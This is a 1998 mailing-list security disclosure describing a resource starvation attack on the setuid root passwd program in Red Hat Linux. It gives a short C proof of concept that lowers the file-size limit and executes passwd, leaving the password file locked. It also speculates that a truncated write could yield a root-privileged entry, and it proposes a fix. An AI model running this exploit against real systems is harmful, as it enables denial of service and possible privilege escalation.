resource starvation against passwd(1)

Antonomasia (ant@NOTATLA.DEMON.CO.UK)
Sun, 22 Feb 1998 17:18:11 +0000 (GMT)

Standard apology if old...

This demonstrates a resource starvation attack on the
setuid root passwd(1) program. In the case I tested it was the
Red Hat Linux passwd-0.50-7 program without shadowing.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>
main ()
{
struct rlimit rl, *rlp;
rlp=&rl;
rlp->rlim_cur=4000 ;
rlp->rlim_max=4000 ;
setrlimit(RLIMIT_FSIZE, rlp);
execl("/usr/bin/passwd", "passwd", (char *) 0);
}

The resource being restricted is filesize, and if the passwd file is
large enough it cannot be written back and the passwd program dies.
This leaves the passwd file locked against further password changes -
a denial of service attack.

I was unable to write back an incomplete passwd file during my tests,
but I can imagine some systems allowing this, in which case you could
aim for an incomplete last line like this

myname:my-epw:
which could be awkward if any authentication programs interpret it as
myname:my-epw:0:0::/:/bin/sh

A suggested fix is for the passwd program to be aware of the size of
the file before writing, and to quit if failure is predicted.

There are obviously other resources that could be restricted, and there
may be a case for increasing limits on cpu time or file descriptors,
or even filesize to ensure successful completion.

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################